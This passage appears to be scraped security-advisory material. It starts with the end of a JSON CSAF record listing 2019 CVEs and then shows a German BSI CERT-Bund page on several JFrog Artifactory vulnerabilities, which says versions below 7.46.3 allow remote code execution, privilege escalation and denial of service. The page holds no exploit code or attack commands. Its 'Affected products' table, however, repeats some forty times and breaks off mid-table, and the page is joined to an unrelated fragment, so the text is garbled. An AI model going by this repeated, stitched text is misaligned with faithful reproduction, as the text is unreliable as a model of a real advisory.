"cve": "CVE-2019-10202",
"product_status": {
"known_affected": [
"T014381",
"342000",
"67646",
"T011787",
"695419",
"T030196",
"T017562",
"T030197"
]
},
"release_date": "2020-04-23T22:00:00.000+00:00",
"title": "CVE-2019-10202"
},
{
"cve": "CVE-2019-12402",
"product_status": {
"known_affected": [
"T014381",
"342000",
"67646",
"T011787",
"695419",
"T030196",
"T017562",
"T030197"
]
},
"release_date": "2020-04-23T22:00:00.000+00:00",
"title": "CVE-2019-12402"
},
{
"cve": "CVE-2019-16869",
"product_status": {
"known_affected": [
"T014381",
"342000",
"67646",
"T011787",
"695419",
"T030196",
"T017562",
"T030197"
]
},
"release_date": "2020-04-23T22:00:00.000+00:00",
"title": "CVE-2019-16869"
},
{
"cve": "CVE-2019-17195",
"product_status": {
"known_affected": [
"T014381",
"342000",
"67646",
"T011787",
"695419",
"T030196",
"T017562",
"T030197"
]
},
"release_date": "2020-04-23T22:00:00.000+00:00",
"title": "CVE-2019-17195"
},
{
"cve": "CVE-2019-17571",
"product_status": {
"known_affected": [
"T014381",
"342000",
"67646",
"T011787",
"695419",
"T030196",
"T017562",
"T030197"
]
},
"release_date": "2020-04-23T22:00:00.000+00:00",
"title": "CVE-2019-17571"
},
{
"cve": "CVE-2019-9512",
"product_status": {
"known_affected": [
"T014381",
"342000",
"67646",
"T011787",
"695419",
"T030196",
"T017562",
"T030197"
]
},
"release_date": "2020-04-23T22:00:00.000+00:00",
"title": "CVE-2019-9512"
},
{
"cve": "CVE-2019-9514",
"product_status": {
"known_affected": [
"T014381",
"342000",
"67646",
"T011787",
"695419",
"T030196",
"T017562",
"T030197"
]
},
"release_date": "2020-04-23T22:00:00.000+00:00",
"title": "CVE-2019-9514"
},
{
"cve": "CVE-2019-9515",
"product_status": {
"known_affected": [
"T014381",
"342000",
"67646",
"T011787",
"695419",
"T030196",
"T017562",
"T030197"
]
},
"release_date": "2020-04-23T22:00:00.000+00:00",
"title": "CVE-2019-9515"
},
{
"cve": "CVE-2019-9518",
"product_status": {
"known_affected": [
"T014381",
"342000",
"67646",
"T011787",
"695419",
"T030196",
"T017562",
"T030197"
]
},
"release_date": "2020-04-23T22:00:00.000+00:00",
"title": "CVE-2019-9518"
}
]
}
WID-SEC-W-2022-1375
Vulnerability from csaf_certbund - Published: 2022-09-11 22:00 - Updated: 2025-10-12 22:00Summary
JFrog Artifactory: Mehrere Schwachstellen
Severity
Hoch
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung: JFrog Artifactory ist eine universelle DevOps-Lösung.
Angriff: Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in JFrog Artifactory ausnutzen, um seine Privilegien zu erweitern, beliebigen Code auszuführen, Sicherheitsmaßnahmen zu umgehen, vertrauliche Informationen offenzulegen und einen Denial-of-Service-Zustand auszulösen.
Betroffene Betriebssysteme: - Linux
- UNIX
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
